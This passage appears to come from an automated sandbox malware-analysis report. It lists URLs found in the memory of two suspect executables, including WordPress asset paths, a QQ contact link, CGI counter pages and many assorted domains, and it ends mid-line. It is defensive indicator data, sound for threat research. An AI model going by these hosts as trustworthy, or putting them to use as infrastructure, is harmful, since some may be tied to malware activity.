                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5e1906bec96d1e3fc9ce
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5e1906bec96d1e3fc9ce5c4f
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5e1906bec96d1e3fc9ce5c4f1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=5e1906bec96d1e3fc9ce5c4f198cbceb
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stopllc.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532642453.00000000076D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832259405.0000000007680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/;_
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/o
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abdg.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.527457283.00000000076A5000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/=
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/NA
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/vA
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709547478.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ageop.org
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/.0:
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl//
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl///
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/J
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/K
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/r
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/v
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709547478.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ant.it
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076E5000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.00000000076E5000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.00000000076E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/3
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/G
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/P(
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 